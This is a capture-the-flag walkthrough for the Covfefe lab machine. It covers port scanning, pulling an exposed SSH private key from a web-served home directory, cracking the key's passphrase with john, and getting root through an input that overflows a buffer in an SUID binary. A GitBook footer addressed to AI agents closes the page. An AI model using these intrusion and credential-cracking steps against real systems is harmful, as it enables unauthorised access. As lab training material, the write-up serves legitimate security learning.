> For the complete documentation index, see [llms.txt](https://viperone.gitbook.io/pentest-everything/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://viperone.gitbook.io/pentest-everything/writeups/pg-play-or-vulnhub/linux/untitled.md). # Covfefe ## Nmap ``` sudo nmap 192.168.184.10 -p- -sS -sV PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.4p1 Debian 10 (protocol 2.0) 80/tcp open http nginx 1.10.3 31337/tcp open Elite? Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel ``` I started off with port 80 and was unable to identify any directories or files. The default page for the port goes to installation for nginix. ![](/files/-MXYBOFvPKnOYezs3AHj) When attempting to browse to port 31337 we are given a 404 not found error. I then ran `dirsearch.py` against the port using the command below which discovered what appeared to be a users home directory contents. ``` python3 dirsearch.py -u http://192.168.184.10:31337 -w /usr/share/seclists/Discovery/Web-Content/big.txt -t 60 --full-url ``` ![](/files/-MXYBi3G1u_qH2ZrspS4) Checking out the /.ssh directory appears to list sub folder contents. ![](/files/-MXYBz8-wxDNOZvRDXCh) I first downloaded the id\_rsa and then authorized\_keys. ``` http://192.168.184.10:31337/.ssh/id_rsa http://192.168.184.10:31337/.ssh/authorized_keys ``` Viewing the contents of authorized\_keys shows the user simon having a key in the file. First use `chmod` on the id\_rsa to set the correct permissions. ``` chmod 600 id_rsa ``` When attempting to use the key to connect by SSH we are prompted to provide a passphrase. ![](/files/-MXYCiREOESG0RpLTgGc) Using ssh2john we can convert the key to a hash which can be sent to John for cracking. ``` /usr/share/john/ssh2john.py id_rsa > /home/kali/Desktop/hash sudo john --wordlist=/usr/share/seclists/Passwords/Common-Credentials/10-million-password-list-top-100000.txt /home/kali/Desktop/hash ``` ![](/files/-MXYCundZR-FK8X99K9s) Now that we have the password `starwars` for for the key we can try signing in again. ``` ssh -i id_rsa simon@192.168.184.10 ``` ![](/files/-MXYD3ckZ0aAI32A4hkq) I then transferred over `linpeas` and executed. Linpeas then identified the binary `/usr/local/bin/read_message` as having the SUID bit set. ![](/files/-MXYI5-6W__xyTLuPSFP) Running the binary and entering the name 'Simon' produces the following output: ![](/files/-MXYIKwx_-2T63iff0Qk) As per the message we can read the source code. Listing the contents of the root directory shows the source code file. ![](/files/-MXYIWyZcQlS2hFTPvd2) It looks like as per the script it will read the first 5 characters to validate if correct but, has a total buffer for 20. We can try to overflow the buffer to execute a command. Running the following when prompted to do so by the binary will give us a root shell. ``` Simonaaaaaaaaaaaaaaa/bin/sh ``` ![](/files/-MXYIqmeKopT5xQu07p6) --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://viperone.gitbook.io/pentest-everything/writeups/pg-play-or-vulnhub/linux/untitled.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.